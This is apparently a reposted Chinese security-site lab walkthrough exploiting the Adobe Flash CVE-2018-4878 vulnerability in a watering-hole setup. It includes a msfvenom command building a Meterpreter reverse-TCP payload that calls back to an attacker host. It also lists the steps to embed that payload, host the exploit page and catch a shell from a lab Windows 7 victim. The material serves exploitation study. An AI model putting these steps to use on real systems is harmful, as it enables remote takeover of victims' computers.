1. 黑客安全网-互联网安全媒体信息综合平台首页
  2. 漏洞信息

水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878)

Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会触发漏洞,可直接getshell。准备工作:靶机信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻击机信息:192.168.2.132(kali linux)漏洞利用脚本:CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)

2.替换原 cve-2018-4878.py中的shellcode,并修改参数stageless=False。水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)3.在代码中修改要生成的文件和路径。水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)4.执行修改后的cve-2018-4878.py文件,生成index和exploit两个文件。水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)5.将生成的两个文件复制到web目录环境下。水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)6.在kali的msf中启用监听。水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html,kali中即可获取到靶机会话。

水坑攻击--Adobe flash player 28漏洞(CVE-2018-4878)

原文链接

相关推荐: 挖洞经验 | 利用Android Studio发现安卓应用漏洞($3000)

本文讲述了作者在一次一次授权安全测试中,利用安卓平台集成开发环境Android Studio发现APP客户端身份验证绕过漏洞,获取用户密码。漏洞最终获得了APP官方总计$3000的奖励,一起来看看。 漏洞背景 为了更好的解释漏洞发现,我先简单介绍一下目标测试A…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/vuls/3268.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注